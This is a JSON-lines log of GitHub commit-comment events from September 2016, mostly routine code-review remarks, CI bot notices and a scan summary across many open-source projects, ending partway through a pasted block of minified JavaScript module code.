{"id":"4507832471","type":"CommitCommentEvent","actor":{"login":"cleggypdc"},"repo":{"name":"pimcore/pimcore"},"payload":{"comment":{"id":18878348,"position":null,"line":null,"path":null,"commit_id":"81f04913eebb9fce8090972bd700f3ad7bad674a","created_at":"2016-09-02T10:44:43Z","updated_at":"2016-09-02T10:44:43Z","body":"@brusch are these files still stored in the same folder as the objects themselves?\r\ni.e.\r\n/var/config/classes?\r\n\r\nMy thinking is that we have been purposely setting our project .gitignore files to ignore the generated Object classes but keep the definitions like so:\r\n\r\n```\r\n##include class definition psfs\r\n!web/website/var/classes/**/*.psf\r\n##exclude the php files\r\nweb/website/var/classes/**/*.php\r\n```\r\n\r\nso with the new .php format this will break this rule, is there another way to distinguish between the two or perhaps a better way of organising these files? :dancer:  - I'm not sure about keeping the generated object classes in git\r\n"}},"created_at":"2016-09-02T10:44:43Z"}
{"id":"4507835778","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18878360,"position":61,"line":61,"path":"src/gui/editorwidgets/qgskeyvaluewidget.h","commit_id":"db46e89696d668ae8c349ab3b45ceb37876b8af3","created_at":"2016-09-02T10:45:33Z","updated_at":"2016-09-02T10:45:33Z","body":"One last comment - would be good to add a preview string for map values in QgsExpression::formatPreviewString so that users get some feedback when using a map field in expression builder"}},"created_at":"2016-09-02T10:45:33Z"}
{"id":"4507837084","type":"CommitCommentEvent","actor":{"login":"ranglanimanish90"},"repo":{"name":"OfficeDev/Project-REST-Basic-Operations"},"payload":{"comment":{"id":18878363,"position":null,"line":null,"path":null,"commit_id":"022cc2156157ff41450086e1cf5f07b55d6f2a8e","created_at":"2016-09-02T10:45:54Z","updated_at":"2016-09-02T10:45:54Z","body":"Hi rpsenski, i tried your suggested solution but still unable to get through. Can you please share your Skype id? So that we can have quick screen share to fix this. Really thankful to you.."}},"created_at":"2016-09-02T10:45:54Z"}
{"id":"4507847617","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"mstembera/Stockfish"},"payload":{"comment":{"id":18878388,"position":null,"line":null,"path":null,"commit_id":"6e5c07abdd9aa423393e706ff9d8298f4fe42cb8","created_at":"2016-09-02T10:48:35Z","updated_at":"2016-09-02T10:48:35Z","body":"@mstembera: nice idea, as I understand it you're trying to estimate if either color has a majority on the queenside or on the kingside, and raise the initiative bonus?"}},"created_at":"2016-09-02T10:48:35Z"}
{"id":"4507847901","type":"CommitCommentEvent","actor":{"login":"mtbc"},"repo":{"name":"openmicroscopy/bioformats"},"payload":{"comment":{"id":18878389,"position":null,"line":null,"path":null,"commit_id":"836a19c0fd923bbb1365c0eb62e67c0e2aaf6167","created_at":"2016-09-02T10:48:40Z","updated_at":"2016-09-02T10:48:40Z","body":":+1:"}},"created_at":"2016-09-02T10:48:40Z"}
{"id":"4507849649","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"Hovwd/Project"},"payload":{"comment":{"id":18878394,"position":1,"line":12,"path":"src/Server.java","commit_id":"8128939dc5100f7ade269d602c03435dcfb4845e","created_at":"2016-09-02T10:49:09Z","updated_at":"2016-09-02T10:49:09Z","body":"Don't use static methods in your repository. \r\nTry set more meaningful names to your classes. \r\nServer -> UserRepository.\r\nAlso this class should implement interface."}},"created_at":"2016-09-02T10:49:09Z"}
{"id":"4507851834","type":"CommitCommentEvent","actor":{"login":"MrKepzie"},"repo":{"name":"MrKepzie/Natron"},"payload":{"comment":{"id":18878397,"position":11,"line":219,"path":"Global/Macros.h","commit_id":"dd32a6a5edeb677b9754b6ff8bbe3372eed8662f","created_at":"2016-09-02T10:49:39Z","updated_at":"2016-09-02T10:49:39Z","body":"Please change that, on Windows this should NOT be hard-coded. See https://github.com/devernay/openfx/blob/master/HostSupport/src/ofxhPluginCache.cpp#L191  and https://github.com/devernay/openfx/blob/master/HostSupport/src/ofxhPluginCache.cpp#L284\r\n\r\n"}},"created_at":"2016-09-02T10:49:39Z"}
{"id":"4507852636","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18878398,"position":null,"line":null,"path":null,"commit_id":"dfcd12306213b6ca054bfa4d69eae84ff9005f86","created_at":"2016-09-02T10:49:50Z","updated_at":"2016-09-02T10:49:50Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#F6eKKA7kSxqtbLL8zQWU8g"}},"created_at":"2016-09-02T10:49:50Z"}
{"id":"4507853676","type":"CommitCommentEvent","actor":{"login":"filhodomauro"},"repo":{"name":"goatslacker/alt"},"payload":{"comment":{"id":18878402,"position":null,"line":null,"path":null,"commit_id":"5b41cadc33b425c53c925de4cb0dafefe7a20982","created_at":"2016-09-02T10:50:07Z","updated_at":"2016-09-02T10:50:07Z","body":"+1"}},"created_at":"2016-09-02T10:50:07Z"}
{"id":"4507854341","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"vshaxe/haxe-languageserver"},"payload":{"comment":{"id":18878404,"position":null,"line":null,"path":null,"commit_id":"f24a574427ccfc8051c8043109653783ab545983","created_at":"2016-09-02T10:50:16Z","updated_at":"2016-09-02T10:50:16Z","body":"I think this was just for the \"import\" action not doing anything yet when Simn originally added it."}},"created_at":"2016-09-02T10:50:16Z"}
{"id":"4507855702","type":"CommitCommentEvent","actor":{"login":"DanielePalombo"},"repo":{"name":"solidusio/solidus"},"payload":{"comment":{"id":18878405,"position":5,"line":39,"path":"core/app/models/spree/order/checkout.rb","commit_id":"ae5f0493196eb00021ad33c73a61da4fbe59fdd1","created_at":"2016-09-02T10:50:37Z","updated_at":"2016-09-02T10:50:37Z","body":"After remove the :save_state action the alias_method related can be removed?\r\n\r\nhttps://github.com/solidusio/solidus/blob/ae5f0493196eb00021ad33c73a61da4fbe59fdd1/core/app/models/spree/order/checkout.rb#L141"}},"created_at":"2016-09-02T10:50:37Z"}
{"id":"4507863433","type":"CommitCommentEvent","actor":{"login":"MrKepzie"},"repo":{"name":"MrKepzie/Natron"},"payload":{"comment":{"id":18878424,"position":11,"line":219,"path":"Global/Macros.h","commit_id":"dd32a6a5edeb677b9754b6ff8bbe3372eed8662f","created_at":"2016-09-02T10:52:44Z","updated_at":"2016-09-02T10:52:44Z","body":"Forget my comment above because on Windows it should not even be installed thee.\r\nOn MacOSX AND Windows this not at all the place where you want to install application dependent plug-ins. PyPlugs is just for Natron, unlike OpenFX. The good \"system-wide\" location can be retrieved in Natron with:\r\n\r\n    StandardPaths::writableLocation(eStandardLocationData)\r\n\r\nOn Linux it's fine. \r\n"}},"created_at":"2016-09-02T10:52:44Z"}
{"id":"4507864729","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"bigretromike/nakamori"},"payload":{"comment":{"id":18878428,"position":null,"line":null,"path":null,"commit_id":"b353197665a1ea065aec90b2d8cafa17ca967e1d","created_at":"2016-09-02T10:53:07Z","updated_at":"2016-09-02T10:53:07Z","body":"Yep"}},"created_at":"2016-09-02T10:53:07Z"}
{"id":"4507867513","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18878432,"position":64,"line":816,"path":"src/mame/drivers/didact.cpp","commit_id":"1d7ba6e45a20f485713a357e987f15c38c65124a","created_at":"2016-09-02T10:53:45Z","updated_at":"2016-09-02T10:53:45Z","body":"The currency sign is 0xa4 if you want to use it.  Merging anyway."}},"created_at":"2016-09-02T10:53:45Z"}
{"id":"4507868409","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"lamozg6/homework10"},"payload":{"comment":{"id":18878434,"position":28,"line":28,"path":"src/Controller/Controller.java","commit_id":"b95a575ea75ec928e5640b6a3a8574e74546d65f","created_at":"2016-09-02T10:54:01Z","updated_at":"2016-09-02T10:54:01Z","body":"You don't need here controllerInstance\r\nYou can just write \r\n`User user = controllerInstance.userCreate(); -> User user = userCreate();`"}},"created_at":"2016-09-02T10:54:01Z"}
{"id":"4507870468","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":18878439,"position":null,"line":null,"path":null,"commit_id":"37668908f9234db55ff04fb22e3d17b8c7114488","created_at":"2016-09-02T10:54:33Z","updated_at":"2016-09-02T10:54:33Z","body":"Your menu is looking really nice on the demo! wow.\r\nSomething that would be nice is to know when a menu item expands to another menu, for example placing the following small icon justified to the right of the menu item that will expand:\r\nhttp://fontawesome.io/icon/caret-right/"}},"created_at":"2016-09-02T10:54:33Z"}
{"id":"4507875584","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":18878454,"position":null,"line":null,"path":null,"commit_id":"37668908f9234db55ff04fb22e3d17b8c7114488","created_at":"2016-09-02T10:55:55Z","updated_at":"2016-09-02T10:55:55Z","body":"Also, regarding the login page, what are your thought of making everything white around the central current login square there and then placing the logos within the current login square only(and with a white background)."}},"created_at":"2016-09-02T10:55:55Z"}
{"id":"4507878275","type":"CommitCommentEvent","actor":{"login":"xiaokai66"},"repo":{"name":"xiaokai66/xiaokai"},"payload":{"comment":{"id":18878461,"position":null,"line":null,"path":null,"commit_id":"168192bd267892c4e6a64d32e0fd07e962f778f1","created_at":"2016-09-02T10:56:37Z","updated_at":"2016-09-02T10:56:37Z","body":"mei"}},"created_at":"2016-09-02T10:56:37Z"}
{"id":"4507879055","type":"CommitCommentEvent","actor":{"login":"joshmoore"},"repo":{"name":"dominikl/rOMERO"},"payload":{"comment":{"id":18878465,"position":null,"line":null,"path":null,"commit_id":"e06766e19530014427d6f3fc76513d1ceb369e14","created_at":"2016-09-02T10:56:51Z","updated_at":"2016-09-02T10:56:51Z","body":"What's the format of the file? For comparison, there's the Ice native config format which is similar to this but uses an \"omero.\" prefix and I think CellProfiler has a format, too. Just that we think somewhat about compatibility here."}},"created_at":"2016-09-02T10:56:51Z"}
{"id":"4507880699","type":"CommitCommentEvent","actor":{"login":"alexey6600"},"repo":{"name":"Negamann303/Huawei-W-1.5-2.0"},"payload":{"comment":{"id":18878468,"position":null,"line":null,"path":null,"commit_id":"03b6759eadec538b9ab0fc191af2931896f3bedb","created_at":"2016-09-02T10:57:17Z","updated_at":"2016-09-02T10:57:17Z","body":"Hello.\r\nAnd how about overall performance lz4 vs lz4hc?\r\nAny lags while swapping process?"}},"created_at":"2016-09-02T10:57:17Z"}
{"id":"4507883017","type":"CommitCommentEvent","actor":{"login":"Bjwebb"},"repo":{"name":"OpenDataServices/grantnav"},"payload":{"comment":{"id":18878473,"position":null,"line":null,"path":null,"commit_id":"3d5f20652aed798e134a9e2f51b62557e46222b7","created_at":"2016-09-02T10:57:56Z","updated_at":"2016-09-02T10:57:56Z","body":"> Change grant page to seperate out extra fields from standard\r\n\r\nTo be explicit, what we're actually separating is fields in the original data, and those GrantNav has added. Fields in the original data, but not in the standard will still appear in the first table. I think this is fine atm, because the first table doesn't say all fields are in the standard."}},"created_at":"2016-09-02T10:57:56Z"}
{"id":"4507883806","type":"CommitCommentEvent","actor":{"login":"danielmarbach"},"repo":{"name":"Particular/NServiceBus"},"payload":{"comment":{"id":18878477,"position":22,"line":102,"path":"src/NServiceBus.Core/DelayedDelivery/TimeoutManager/ExpiredTimeoutsPoller.cs","commit_id":"4d73e137ad9a147eb54d0cefa80479b81e1f1225","created_at":"2016-09-02T10:58:10Z","updated_at":"2016-09-02T10:58:10Z","body":"Well technically if we fetch N-number of timeouts and abort in the middle, we are going to fetch them again in the next reboot. We could also say we favour a design where we try to send out the already fetched ones and not allow early cancellation (just a food for thought)"}},"created_at":"2016-09-02T10:58:10Z"}
{"id":"4507886111","type":"CommitCommentEvent","actor":{"login":"olear"},"repo":{"name":"MrKepzie/Natron"},"payload":{"comment":{"id":18878480,"position":null,"line":null,"path":null,"commit_id":"dd32a6a5edeb677b9754b6ff8bbe3372eed8662f","created_at":"2016-09-02T10:58:45Z","updated_at":"2016-09-02T10:58:45Z","body":"StandardPaths::writableLocation does not look like something that is system-wide, it's only for that specific user(?)"}},"created_at":"2016-09-02T10:58:45Z"}
{"id":"4507887418","type":"CommitCommentEvent","actor":{"login":"SandPox"},"repo":{"name":"jaehyek/wifienable"},"payload":{"comment":{"id":18878482,"position":null,"line":null,"path":null,"commit_id":"3b9d5b6ccec419ee9f6bc7592265fb692562b449","created_at":"2016-09-02T10:59:07Z","updated_at":"2016-09-02T10:59:07Z","body":"@jaehyek Hey, can I have an archive of this repo?\r\nhttps://github.com/jaehyek/emmc2\r\nit has been taken down by DMCA but I want some file in it to study"}},"created_at":"2016-09-02T10:59:07Z"}
{"id":"4507890042","type":"CommitCommentEvent","actor":{"login":"dsoin"},"repo":{"name":"dsoin/outlook4all"},"payload":{"comment":{"id":18878491,"position":null,"line":null,"path":null,"commit_id":"568fa64f40af07168150047cac832326d172ab02","created_at":"2016-09-02T10:59:47Z","updated_at":"2016-09-02T10:59:47Z","body":"Checkmarx scan results 02 Sep 2016 11:59 UTC +01:00\r\n<table>\r\n<thead>\r\n<tr>\r\n<th></th>\r\n<th>High</th>\r\n<th>Medium</th>\r\n<th>Low</th>\r\n<th>Info</th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><b>New</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Recurrent</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">4</td>\r\n<td align=\"center\">11</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Fixed</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href= \"http://DESKTOP-INCFC74/CxWebClient/ViewerMain.aspx?scanid=1010008&projectid=2\"> Open Viewer</a>\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/dsoin/outlook4all/commit/568fa64f40af07168150047cac832326d172ab02\">568fa64f40af07168150047cac832326d172ab02</a></td><td>@dsoin</td></tr></table>\r\n"}},"created_at":"2016-09-02T10:59:47Z"}
{"id":"4507891824","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18878496,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-02T11:00:16Z","updated_at":"2016-09-02T11:00:16Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.155](http://build.clear-measure.com/viewLog.html?buildId=10341&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-02T11:00:16Z"}
{"id":"4507893853","type":"CommitCommentEvent","actor":{"login":"TiberiumPY"},"repo":{"name":"TiberiumPY/puremine"},"payload":{"comment":{"id":18878500,"position":null,"line":null,"path":null,"commit_id":"78780457b019866ba6fc225fcfbcd3831bc2ddbb","created_at":"2016-09-02T11:00:43Z","updated_at":"2016-09-02T11:00:43Z","body":"I think at least not now, because I'm not a professional programmer, and this server isn't written from scratch by me (as you can see, I forked the server and refactoring it).\r\n"}},"created_at":"2016-09-02T11:00:43Z"}
{"id":"4507895092","type":"CommitCommentEvent","actor":{"login":"giig1967g"},"repo":{"name":"giig1967g/openhab"},"payload":{"comment":{"id":18878502,"position":null,"line":null,"path":null,"commit_id":"067c32ab964571410cf8584c6afdb7504f681205","created_at":"2016-09-02T11:01:01Z","updated_at":"2016-09-02T11:01:01Z","body":"The idea is to add commands to perform the following JSON-RPC actions:\r\nCursor movements: UP, DOWN, LEFT, RIGHT, SELECT, BACK, HOME\r\nDisplay Info: INFO, CODEC, OSD, CONTEXTMENU\r\nOthers to come\r\nTested on my system and work fine.\r\nTOmorrow will upload the file changes."}},"created_at":"2016-09-02T11:01:01Z"}
{"id":"4507897463","type":"CommitCommentEvent","actor":{"login":"mattlewis92"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":18878508,"position":null,"line":null,"path":null,"commit_id":"2dc68a4785b7d9218a0d5bb936efd35cbb554e1b","created_at":"2016-09-02T11:01:37Z","updated_at":"2016-09-02T11:01:37Z","body":"I've added a test suite here: https://github.com/driftyco/ionic-native/pull/523 with the improved (not leaking $q onto the `IonicNative`) ng1 promises fix I proposed in the other issue, you're welcome to check out the branch and hack about to try and find a better solution, currently using the `run` block is the only way I can find though 😞 (I had a look to see how the ionic-cloud client works and that uses the run block too: https://github.com/driftyco/ionic-cloud/blob/master/src/angular.js#L54)"}},"created_at":"2016-09-02T11:01:37Z"}
{"id":"4507898590","type":"CommitCommentEvent","actor":{"login":"Speins"},"repo":{"name":"Speins/TestRepo"},"payload":{"comment":{"id":18878512,"position":null,"line":null,"path":null,"commit_id":"c891bd1bf0ec2a83402976c204b4478e1551b26d","created_at":"2016-09-02T11:01:55Z","updated_at":"2016-09-02T11:01:55Z","body":"new yay"}},"created_at":"2016-09-02T11:01:55Z"}
{"id":"4507900808","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18878516,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-02T11:02:27Z","updated_at":"2016-09-02T11:02:27Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.155](http://build.clear-measure.com/viewLog.html?buildId=10341&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:11"}},"created_at":"2016-09-02T11:02:27Z"}
{"id":"4507903503","type":"CommitCommentEvent","actor":{"login":"SmokyBot"},"repo":{"name":"liquibase/liquibase"},"payload":{"comment":{"id":18878522,"position":null,"line":null,"path":null,"commit_id":"76b140747066a23d68d52ef485adcd8c65a9d9d2","created_at":"2016-09-02T11:03:13Z","updated_at":"2016-09-02T11:03:13Z","body":"Guess who is getting this exception in his project right now :)"}},"created_at":"2016-09-02T11:03:13Z"}
{"id":"4507906996","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"Catzenjaeger/FigureLib_4"},"payload":{"comment":{"id":18878528,"position":null,"line":null,"path":null,"commit_id":"190fbd139518ca25a00da65c70a45cf33e1c9cd6","created_at":"2016-09-02T11:04:09Z","updated_at":"2016-09-02T11:04:09Z","body":"Edited directly via Github :smile: "}},"created_at":"2016-09-02T11:04:09Z"}
{"id":"4507909899","type":"CommitCommentEvent","actor":{"login":"dominikl"},"repo":{"name":"dominikl/rOMERO"},"payload":{"comment":{"id":18878533,"position":null,"line":null,"path":null,"commit_id":"e06766e19530014427d6f3fc76513d1ceb369e14","created_at":"2016-09-02T11:04:55Z","updated_at":"2016-09-02T11:04:55Z","body":"That's true. I'll change that to match the ice config format `omero.user` etc."}},"created_at":"2016-09-02T11:04:55Z"}
{"id":"4507915317","type":"CommitCommentEvent","actor":{"login":"MrKepzie"},"repo":{"name":"MrKepzie/Natron"},"payload":{"comment":{"id":18878555,"position":null,"line":null,"path":null,"commit_id":"dd32a6a5edeb677b9754b6ff8bbe3372eed8662f","created_at":"2016-09-02T11:06:24Z","updated_at":"2016-09-02T11:06:24Z","body":"See http://doc.qt.io/qt-5/qstandardpaths.html\r\n\r\nMaybe a better value is AppLocalDataLocation or AppDataLocation. \r\n\r\nIn any case yes, it should be in a directory where only Natron specific data is installed, e.g:\r\n\r\n   OSX: \r\n    /Users/<USER>/Library/Application Support/Natron/Plugins \r\n\r\n    Windows:\r\n\r\n    C:/Users/<USER>/AppData/Local/Natron/Plugins\r\n\r\nIn any case this should be retuned by the application and not \"forced\". If you want to indicate users a \"static\" location where to install plug-ins, tell them to install in ~.Natron, that's they way things are done\r\n    "}},"created_at":"2016-09-02T11:06:24Z"}
{"id":"4507915641","type":"CommitCommentEvent","actor":{"login":"jcarsique"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":18878557,"position":4,"line":126,"path":"nuxeo-services/nuxeo-platform-web-common/src/main/java/org/nuxeo/ecm/platform/ui/web/auth/NuxeoAuthenticationFilter.java","commit_id":"38d7b2a0b240a1552cdafadbe5054070425d64b1","created_at":"2016-09-02T11:06:30Z","updated_at":"2016-09-02T11:06:30Z","body":"Yes, you're right about the constant value.\r\nIt is part of the API as soon as it's public."}},"created_at":"2016-09-02T11:06:30Z"}
{"id":"4507919855","type":"CommitCommentEvent","actor":{"login":"JiaxinTse"},"repo":{"name":"JiaxinTse/My-First-Test"},"payload":{"comment":{"id":18878574,"position":null,"line":null,"path":null,"commit_id":"686aabb6c558b418e581b4e8d95a3a49c27bfbca","created_at":"2016-09-02T11:07:37Z","updated_at":"2016-09-02T11:07:37Z","body":"hello"}},"created_at":"2016-09-02T11:07:37Z"}
{"id":"4507920236","type":"CommitCommentEvent","actor":{"login":"danieldietrich"},"repo":{"name":"javaslang/javaslang"},"payload":{"comment":{"id":18878575,"position":138,"line":224,"path":"javaslang/src/main/java/javaslang/collection/Map.java","commit_id":"d805e420f97a6255457f1d483fd9af66dfacbac7","created_at":"2016-09-02T11:07:43Z","updated_at":"2016-09-02T11:07:43Z","body":"Mmhh, really? Thought the code should compile with both. This is an old comment, I don't added it. We still have some of these cases in our code base.\r\n\r\nI'm not sure if we should completely drop the Eclipse support. It is relatively cheap to achieve..."}},"created_at":"2016-09-02T11:07:43Z"}
{"id":"4507923319","type":"CommitCommentEvent","actor":{"login":"ZidCode"},"repo":{"name":"ZidCode/Ibsen_processor"},"payload":{"comment":{"id":18878582,"position":56,"line":56,"path":"ASD_Jeti_Ibsen_Intercal/Evaluation_Methods/Ibsen_level1_processor.py","commit_id":"7d50bba03dbfd9740afa95e4dc4a403999da8d09","created_at":"2016-09-02T11:08:34Z","updated_at":"2016-09-02T11:08:34Z","body":"Should we not use the sample standard deviation, Kerstin R program uses this as default? ddof = 1"}},"created_at":"2016-09-02T11:08:34Z"}
{"id":"4507923971","type":"CommitCommentEvent","actor":{"login":"GoodBluee"},"repo":{"name":"GoodBluee/tesrrrrrrrrrrrrrrrrrr"},"payload":{"comment":{"id":18878585,"position":1,"line":1,"path":"tata","commit_id":"6d9f4a29220850fd0f7c883fa0b5024db027ac40","created_at":"2016-09-02T11:08:44Z","updated_at":"2016-09-02T11:08:44Z","body":"这写什么"}},"created_at":"2016-09-02T11:08:44Z"}
{"id":"4507924768","type":"CommitCommentEvent","actor":{"login":"GoodBluee"},"repo":{"name":"GoodBluee/tesrrrrrrrrrrrrrrrrrr"},"payload":{"comment":{"id":18878589,"position":1,"line":1,"path":"tata","commit_id":"6d9f4a29220850fd0f7c883fa0b5024db027ac40","created_at":"2016-09-02T11:08:57Z","updated_at":"2016-09-02T11:08:57Z","body":"这又是写什么"}},"created_at":"2016-09-02T11:08:57Z"}
{"id":"4507925966","type":"CommitCommentEvent","actor":{"login":"GoodBluee"},"repo":{"name":"GoodBluee/tesrrrrrrrrrrrrrrrrrr"},"payload":{"comment":{"id":18878595,"position":null,"line":null,"path":null,"commit_id":"6d9f4a29220850fd0f7c883fa0b5024db027ac40","created_at":"2016-09-02T11:09:17Z","updated_at":"2016-09-02T11:09:17Z","body":"这又又又是写什么"}},"created_at":"2016-09-02T11:09:17Z"}
{"id":"4507926643","type":"CommitCommentEvent","actor":{"login":"mondalaci"},"repo":{"name":"UltimateHackingKeyboard/agent"},"payload":{"comment":{"id":18878596,"position":32,"line":26,"path":"src/store/storage/local.ts","commit_id":"028091d444e36faf46ec75c7415552da0a203691","created_at":"2016-09-02T11:09:28Z","updated_at":"2016-09-02T11:09:28Z","body":"Any reason why not use `.toJsObject` for these two?"}},"created_at":"2016-09-02T11:09:28Z"}
{"id":"4507928281","type":"CommitCommentEvent","actor":{"login":"fuerbringer"},"repo":{"name":"fuerbringer/M254-Kapitel5"},"payload":{"comment":{"id":18878602,"position":null,"line":null,"path":null,"commit_id":"d64a4f7e0c4c87126527b7a23677ec7e0aba10bd","created_at":"2016-09-02T11:09:55Z","updated_at":"2016-09-02T11:09:55Z","body":"Thanks mate :rocket: :santa: "}},"created_at":"2016-09-02T11:09:55Z"}
{"id":"4507930922","type":"CommitCommentEvent","actor":{"login":"wrichter"},"repo":{"name":"wrichter/hailstorm"},"payload":{"comment":{"id":18878607,"position":null,"line":null,"path":null,"commit_id":"38c2099fbd742f1dff2ea8c67c1ec5e194237bb2","created_at":"2016-09-02T11:10:38Z","updated_at":"2016-09-02T11:10:38Z","body":"LOL das hat bei mir Kopfzerbrechen bereitet.... warum hattest du das eigentlich aaskommentiert? ansible/roles/layer2_infrastructure/tasks/configure_named.yml"}},"created_at":"2016-09-02T11:10:38Z"}
{"id":"4507931590","type":"CommitCommentEvent","actor":{"login":"olear"},"repo":{"name":"MrKepzie/Natron"},"payload":{"comment":{"id":18878611,"position":null,"line":null,"path":null,"commit_id":"dd32a6a5edeb677b9754b6ff8bbe3372eed8662f","created_at":"2016-09-02T11:10:48Z","updated_at":"2016-09-02T11:10:48Z","body":"Ok, so  ```/Users/Library/Application Support/Natron/Plugins```  sounds ok, I guess all users have access to that directory?\r\n\r\n```C:/Users/<USER>/AppData/Local/Natron/Plugins``` Does not work, that is not a system-wide directory.\r\n\r\n```~/.Natron``` is fine for that individual user, but not for system-wide deployment of plugins."}},"created_at":"2016-09-02T11:10:48Z"}
{"id":"4507936660","type":"CommitCommentEvent","actor":{"login":"jerrinot"},"repo":{"name":"jerrinot/hazelcast"},"payload":{"comment":{"id":18878621,"position":5,"line":228,"path":"hazelcast-client/src/main/java/com/hazelcast/client/connection/nio/ClientConnectionManagerImpl.java","commit_id":"dbeb29291724cbf1ace34abc86bc143e74a25927","created_at":"2016-09-02T11:12:12Z","updated_at":"2016-09-02T11:12:12Z","body":"this is the only real change. do not return non-alive connections."}},"created_at":"2016-09-02T11:12:12Z"}
{"id":"4507942276","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"MikayelSmbatian/TellPhoneBook"},"payload":{"comment":{"id":18878628,"position":4,"line":80,"path":"src/Pack/Address.java","commit_id":"e3b7c7e1757586edb4b0bb3e2299f5cd9c8afba0","created_at":"2016-09-02T11:13:45Z","updated_at":"2016-09-02T11:13:45Z","body":"ShowFriendsList -> showFriendsList"}},"created_at":"2016-09-02T11:13:45Z"}
{"id":"4507942732","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18878631,"position":null,"line":null,"path":null,"commit_id":"7eb91c6290cf6f6b0d84c8e8a55d92d6fc650549","created_at":"2016-09-02T11:13:52Z","updated_at":"2016-09-02T11:13:52Z","body":"@atamariya What @SubJunk is saying is that it's not about retrieving lost information but about reducing further degradation. In @SubJunk's example the 100% source is before it's encoded into the current lossy media format we have accessable. UMS is doing the \"second degradation\" (as we're talking about transcoding lossy to lossy), and it's about limiting the quality degradation in the second stage of degradation. The first one we can do nothing about because that's done before the media reached UMS."}},"created_at":"2016-09-02T11:13:52Z"}
{"id":"4507943442","type":"CommitCommentEvent","actor":{"login":"daddy995"},"repo":{"name":"BrightcoveOS/videojs-ga-videocloud"},"payload":{"comment":{"id":18878632,"position":59,"line":56,"path":"README.md","commit_id":"0e6d05cc2be5307bc4b033a5abc8c01d1c132361","created_at":"2016-09-02T11:14:04Z","updated_at":"2016-09-02T11:14:04Z","body":"\r\nCSS_START:\"css\",CSS_END:\"css_load\",DISPLAY_START:\"display_start\",DISPLAY_END:\"display\",JS_START:\"jsstart\",JS_END:\"jsdone\",ONLOAD_START:\"preonload\",ONLOAD_END:\"onload\",SETUP:\"setup\"};}),null);\r\n__d(\"TimeSpentPageTransitionCause\",[],(function a(b,c,d,e,f,g){c.__markCompiled&&c.__markCompiled();f.exports={PAGE_LOAD:\"load\",PAGE_UNLOAD:\"unload\",TRANSITION:\"transition\",OPEN_OVERLAY_VIEW:\"open_overlay_view\",REPLACE_OVERLAY_VIEW:\"replace_overlay_view\",CLOSE_OVERLAY_VIEW:\"close_overlay_view\"};}),null);\r\n__d(\"Env\",[],(function a(b,c,d,e,f,g){if(c.__markCompiled)c.__markCompiled();var h={start:Date.now()};if(b.Env){Object.assign(h,b.Env);b.Env=undefined;}f.exports=h;}),null);\r\n__d('eprintf',[],(function a(b,c,d,e,f,g){if(c.__markCompiled)c.__markCompiled();var h=function i(j){var k=Array.prototype.slice.call(arguments).map(function(n){return String(n);}),l=j.split('%s').length-1;if(l!==k.length-1)return i('eprintf args number mismatch: %s',JSON.stringify(k));var m=1;return j.replace(/%s/g,function(n){return String(k[m++]);});};f.exports=h;}),null);\r\n__d('ex',['eprintf'],(function a(b,c,d,e,f,g){if(c.__markCompiled)c.__markCompiled();var h=function i(){for(var j=arguments.length,k=Array(j),l=0;l<j;l++)k[l]=arguments[l];k=k.map(function(m){return String(m);});if(k[0].split('%s').length!==k.length)return i('ex args number mismatch: %s',JSON.stringify(k));return i._prefix+JSON.stringify(k)+i._suffix;};h._prefix='<![EX[';h._suffix=']]>';f.exports=h;}),null);\r\n__d('erx',['ex'],(function a(b,c,d,e,f,g){if(c.__markCompiled)c.__markCompiled();var h=function i(j){if(typeof j!=='string')return j;var k=j.indexOf(c('ex')._prefix),l=j.lastIndexOf(c('ex')._suffix);if(k<0||l<0)return [j];var 